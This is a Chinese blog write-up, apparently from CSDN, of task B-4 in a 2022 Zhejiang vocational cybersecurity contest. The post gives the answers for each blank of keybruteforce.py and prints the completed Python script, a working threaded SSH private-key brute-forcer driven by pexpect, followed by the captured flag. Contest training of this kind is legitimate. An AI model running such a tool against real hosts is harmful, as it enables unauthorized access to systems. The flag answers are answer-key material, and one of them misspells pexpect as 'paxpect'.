2022浙江省赛“中职网络安全“——python解析(keybruteforce.py)

已于 2022-09-30 08:08:59 修改
阅读量2.7k 收藏 23
点赞数 4
文章标签: 网络安全 学习
于 2022-09-29 23:02:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54193916/article/details/127115029
版权

目录

B-4:私钥暴力破解攻击

分析程序

B-4:私钥暴力破解攻击

任务环境说明:

  • 服务器场景:Server2211(关闭链接)
  • FTP用户名:匿名用户
  1. 通过渗透机访问靶机FTP服务,获取FTP服务中的Python文件,将Python文件的文件名作为Flag值提交;

Flag{keybruteforce}

  1. 完善获取的Python文件,填写该文件当中空缺的Flag1 字符串,并将该字符串作为 Flag 值提交;

Flag1{paxpect.threading}

  1. 继续完善Python文件,填写该文件当中空缺的Flag2字符串,并将该字符串作为 Flag 值提交;

Flag2{global}

  1. 继续完善Python文件,填写该文件当中空缺的Flag3字符串,并将该字符串作为 Flag 值提交;

Flag3{user,host}

  1. 继续完善Python文件,填写该文件当中空缺的Flag4字符串,并将该字符串作为 Flag 值提交;

Flag4{Stop}

  1. 继续完善Python文件,填写该文件当中空缺的Flag5字符串,并将该字符串作为 Flag 值提交;2

Flag5{parse_args}

  1. 将完善好的Python文件在 Kali上执行,将执行成功后的“Success”后面的内容作为 Flag 值提交。

Flag

分析程序

源码

#!/usr/bin/python3
#-*- coding:utf-8 -*-

import F1
import optparse
import os
from F2 import *

# Flag1 = F1.F2

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False

def connect(user, host, keyfile, release):
    Flag2 Stop
    try:
        perm_denied = "Permission denied"
        ssh_newkey = "Are you sure you want to continue"
        conn_closed = "Conection closed by remote host"
        opt = " -o PasswordAuthentication=no"
        connCmd = "ssh " + user + "@" + host + " -i " + keyfile + opt
        child = pexpect.spawn(connCmd)
        ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, "$ ", "# ", ])
        if (ret == 2):
            print("[-] Adding Host to known_hosts")
            child.sendline("yes")
            connect(F3, F4, keyfile, False)
        elif (ret == 3):
            print("[-] Connection Closed By Remote Host")
        elif (ret > 3):
            print("[+] Success. " + str(keyfile))
            Flag4 = True
    finally:
        if release:
            connection_lock.release()

# Flag3 = F3.F4

def main():
    parser = optparse.OptionParser("usage%prog -h <target host> -u <user> -d <key directory>")
    parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
    parser.add_option("-d", dest="keyDir", type="string", help="specify key directory")
    parser.add_option("-u", dest="user", type="string", help="specify user")
    (options, args) = parser.Flag5()
    host = options.tgtHost
    keyDir = options.keyDir
    user = options.user
    if ((host == None) or (keyDir == None) or (user == None)):
        print(parser.usage)
        exit(0)
    for filename in os.listdir(keyDir):
        if Stop:
            print("[*] Exiting: Key Found.")
            exit(0)
        connection_lock.acquire()
        fullpath = os.path.join(keyDir, filename)
        print("[#] Testing Keyfile: " + str(fullpath))
        t = Thread(target=connect, args=(user, host, fullpath, True))
        child = t.start()

if __name__ == "__main__":
    main()

首先我们先看开头,是导入模块,我们要先分清楚直接import导入模块和使用from导入模块的区别

import导入的模块,使用的时候要加上它的模块名,比如optparse模块

我们继续看发现,在这里会有个报错(我这里是安装好了pexpect模块,没有显示)

 我们就可以推出F1是pexpect

 from导入的模块是可以直接使用模块内的函数,比如 BoundedSemaphore,这个是threading模块提供的,所以可以确定F2是threading

所以flag1{pexpect.threading}

flag2是在一个变量前面,又在一个自定义函数中,说明这个Stop这个变量是继续用下去的

 不确定的话,我们可以看mian函数,也是有使用Stop变量

 说明Flag2声明Stop是全局变量

所以flag2{global}

 由自定义函数可以得到F3=user,F4=host

所以Flag3={user,host}

所以flag4{Stop}

通过这个点可以确定是使用了parse_args函数

所以flag5{parse_args}

完成后的程序源码

#!/usr/bin/python3
# -*- coding:utf-8 -*-

import pexpect  # F1=paxpect
import optparse
import os
from threading import *  # F2=threading

# Flag1 = paxpect.threading

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)  # BoundedSemaphore -->是threading模块的
Stop = False


def connect(user, host, keyfile, release):
    global Stop  # flag2=global
    try:
        perm_denied = "Permission denied"
        ssh_newkey = "Are you sure you want to continue"
        conn_closed = "Conection closed by remote host"
        opt = " -o PasswordAuthentication=no"
        connCmd = "ssh " + user + "@" + host + " -i " + keyfile + opt
        child = pexpect.spawn(connCmd)
        ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, "$ ", "# ", ])
        if (ret == 2):
            print("[-] Adding Host to known_hosts")
            child.sendline("yes")
            connect(user, host, keyfile, False)  # F3=user F4=host
        elif (ret == 3):
            print("[-] Connection Closed By Remote Host")
        elif (ret > 3):
            print("[+] Success. " + str(keyfile))
            Stop = True  # flag4=Stop
    finally:
        if release:
            connection_lock.release()


# Flag3 = user.host

def main():
    parser = optparse.OptionParser("usage%prog -h <target host> -u <user> -d <key directory>")
    parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
    parser.add_option("-d", dest="keyDir", type="string", help="specify key directory")
    parser.add_option("-u", dest="user", type="string", help="specify user")
    (options, args) = parser.parse_args()  # flag5=parse_args
    host = options.tgtHost
    keyDir = options.keyDir
    user = options.user
    if ((host == None) or (keyDir == None) or (user == None)):
        print(parser.usage)
        exit(0)
    for filename in os.listdir(keyDir):
        if Stop:
            print("[*] Exiting: Key Found.")
            exit(0)
        connection_lock.acquire()
        fullpath = os.path.join(keyDir, filename)
        print("[#] Testing Keyfile: " + str(fullpath))
        t = Thread(target=connect, args=(user, host, fullpath, True))
        child = t.start()


if __name__ == "__main__":
    main()

把文件放到kali上运行,-u为root -H为靶机ip  -d为文件

 等待过程有点久,最后的结果为

 flag{rsa/ca8dd4d1-c0da-4384-ab5c-2649ad949210}

考古假
关注
  • 4
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
2022浙江中职组“网络空间安全”赛项模块B--Linux渗透测试
Aluxian_的博客
11-14 1728
2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件文件名称作为FLAG提交;3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件文件内容作为FLAG提交;5.通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为FLAG提交。
2022中职组“网络安全”赛项浙江省任务书
12-09
2022中职组“网络安全”赛项浙江省任务书
2021年山东省职业院校技能大赛中职组”网络安全“正式赛题
旺仔Sec&blog
07-20 3386
模块 A 基础设施设置与安全加固一、服务器环境说明 Windows server 2008 系统:用户名 administrator,密码123456Linux 系统:用户名 root,密码 123456二、说明: 1.所有截图要求截图界面、字体清晰,并粘贴于相应题目要求的位置;2.文件名命名及保存:网络安全模块 A-XX(XX 为工位号),PDF格式保存;3.文件保存到 U 盘提交。三、具体任务(每个任务得分电子答题卡为准)
2024全国职业技能大赛浙江省嘉兴市“网络空间安全赛项”赛题及赛题解析(超详细)_嘉兴市ji一类赛事 网络安全(2)
最新发布
2401_84240454的博客
05-05 678
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(1)解析
PushSafe
05-17 3826
2021年全国职业院校技能大赛(中职组) 网络安全竞赛试题 (1) (总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全...
2020年全国职业院校技能大赛改革试点赛(中职组)
5L2g556F5ZWl77yf
10-17 5637
为赛卷一,环境都是自己做的,仅作参考 网络安全竞赛试题 (一)(总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全加固 3
2024年第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛正式卷任务书
Aluxian_的博客
11-26 661
1.在 JavaScript 语言中,将给定的长字符串转换为一个数组的方法,将该方法应用于逆向解码操作(可执行文件位于Server2023111301桌面逆向分析文件夹中),所得的结果进行Base64运算,将过程中使用的方法作为Flag值提交(例如:array.splice());2.写出在字符串中匹配连续的四个字符,且每两个字符之间用空格分隔的正则匹配表达式,将该正则表达式应用于逆向解码操作,所得的结果进行Base64运算,将过程中使用的方法作为Flag值提交(例如:array.splice());
2021 年山东省职业院校技能大赛中职组“网络安全” 赛项
热门推荐
Jay
12-01 1万+
2021 年山东省职业院校技能大赛 中职组“网络安全” 赛项 竞赛题库 网络安全赛项专家组 2021 年 11 月 赛题说明 一、 竞赛时间安排与分值权重 二、 竞赛拓扑图 模块编号 模块名称 竞赛时间 (小时) 权值 A 基础设施设置与安全加固 3 20% B 网络安全事件响应、 数字取证调查和应用安全 40% C CTF 夺旗-攻击 3 20% D CTF 夺旗-防御 20% 总计 6
2023年第十六届山东省职业院校技能大赛中职组“网络安全”赛项竞赛正式试题
旺仔Sec&blog
11-27 1363
每个参赛队拥有专属的堡垒机服务器,其他队不能访问。每周六的7:30重新启动ssh服务;5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;2.靶机服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;2.堡垒服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;
2022中职组“网络安全”黑龙江省赛任务书.docx
01-23
2022中职组“网络安全”黑龙江省赛任务书.docx
2022湖南省中职网络安全赛项规程.pdf
12-01
2022年度“楚怡杯”湖南省职业院校网络安全大赛竞赛赛项规程,附加样题
2022中职组“网络安全”赛项河南省任务书
12-09
2022中职组“网络安全”赛项河南省任务书
2022中职组“网络安全”赛项贵州省赛项任务书
12-09
2022中职组“网络安全”赛项贵州省赛项任务书
2024年全国职业技能大赛“网络安全赛项”国赛 模块B 任务解析(超详细)_2024年全国职业院校技能大赛高职组“网络空间安全(1)
2401_84247559的博客
04-26 445
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。,毕竟实战是检验真理的唯一标准嘛~最后就是项目实战,这里带来的是。
第45届世界技能大赛“网络安全”赛项浙江省选拔赛竞赛任务书
旺仔Sec&blog
02-25 2434
第45届世界技能大赛“网络安全”赛项浙江省选拔赛竞赛任务书
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 451
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
2022中职组“网络安全”赛项浙江B模块
武恩赐
02-12 679
2022中职组“网络安全”赛项浙江B模块
2021年江苏省职业院校技能大赛中职网络信息安全赛项试卷
FogIslandBay的博客
09-25 5893
任务五:Linux操作系统渗透测试 通过渗透机Kali对靶机服务器进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;(1分) 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件文件名称作为Flag值提交;(1分) 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;(1分) 通过渗透机Kali对靶机服务器进行渗
中职网络安全竞赛B模块新题
旺仔Sec&blog
08-03 1596
6. 编辑Python程序0062.py,使该程序实现基于socket的redis未授权识别,填写文件当中空缺的F6字符串,写出if成立的执行语句;1. 从靶机服务器的FTP上下载0064.py,编辑Python程序,使该程序实现弱口令爆破,填写文件当中空缺的F1字符串,生成密码列表。,编辑Python程序,使该程序实现基于socket的redis未授权识别,填写文件当中空缺的F1字符串,生成socket对象。分析该文件,找出黑客入侵获取的敏感文件,提交该敏感文件泄露的时间。
中职网络安全技能省赛
12-12
中职网络安全技能省赛是为了检验中职学校网络信息安全人才培养成效,促进网络信息安全专业教学改革,培养大批既满足国家网络安全战略需要又具备世界水平的优秀技能人才,在社会上营造“技能改变命运、匠心成就人生”...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值